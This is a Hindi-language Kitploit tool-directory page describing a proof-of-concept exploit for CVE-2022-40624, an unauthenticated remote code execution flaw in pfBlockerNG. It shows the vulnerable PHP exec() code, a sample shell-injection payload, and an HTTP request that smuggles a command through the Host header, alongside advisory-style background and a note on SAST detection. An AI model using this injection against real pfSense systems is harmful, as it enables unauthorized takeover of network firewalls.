Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pfBlockerNg-CVE-2022-40624 — pfBlockerNg में DNSBL TLD क्वेरी फ़ंक्शन में अस्वच्छित इनपुट के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, SAST डिटेक्शन विश्लेषण के साथ। | Kitploit
उपकरण/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

pfBlockerNg में DNSBL TLD क्वेरी फ़ंक्शन में अस्वच्छित इनपुट के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, SAST डिटेक्शन विश्लेषण के साथ।

रिपॉजिटरी देखें
244 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

pfBlockerNg-CVE-2022-40624

पृष्ठभूमि

pfBlockerNG, pfBlocker की अगली पीढ़ी है जिसमें निम्नलिखित विशेषताएं हैं:

  1. IPv4/v6 सूची स्रोतों को 'अस्वीकार, अनुमति या मिलान' प्रारूपों में प्रबंधित करें।
  2. MaxMind Inc. द्वारा GeoIP डेटाबेस (GeoLite2 मुफ्त संस्करण)।
  3. डी-डुप्लीकेशन, दमन, और प्रतिष्ठा संवर्धन।
  4. विविध सूची प्रारूपों से डाउनलोड करने का प्रावधान।
  5. Proofpoint ET IQRisk IP प्रतिष्ठा खतरे के स्रोतों के लिए उन्नत एकीकरण।
  6. Unbound DNS रिज़ॉल्वर के माध्यम से डोमेन नाम (DNSBL) अवरोधन।

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

प्रभावित संस्करण

pfBlockerNg <2.1.4_27

कमजोरी

बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE)

index.php के TLD ब्लॉक अनुभाग के लिए क्वेरी में HEADER होस्ट स्रोत से एक अशुद्ध/अनएस्केप्ड उपयोगकर्ता इनपुट d_query को PHP exec फ़ंक्शन सिंक में शामिल किया गया है।

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

शोषण

pfsense वेब कंसोल तक HTTP पहुंच आवश्यक है नमूना पेलोड: ' *; sleep 5; '

POC अनुरोध:

GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

प्रेरणा

मुझे pfBlockerNg पसंद है और मैं Di r00t के हालिया CVE-2022-31814 और बेहतरीन लेख https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ से प्रेरित हुआ और यह जानने को उत्सुक था कि क्या Snyk स्थैतिक एप्लिकेशन सुरक्षा परीक्षण (SAST) उपकरण इस कमजोरी का पता लगाएगा। इसलिए मैंने संबंधित index.php संस्करण 2.1.4_26 फ़ाइल डाउनलोड की और उसके विरुद्ध Snyk Code चलाया। निश्चित रूप से Snyk ने कमजोरी के साथ-साथ कुछ पंक्तियों बाद एक और समान रिपोर्टिंग का पता लगाया।

टूल डाउनलोड करें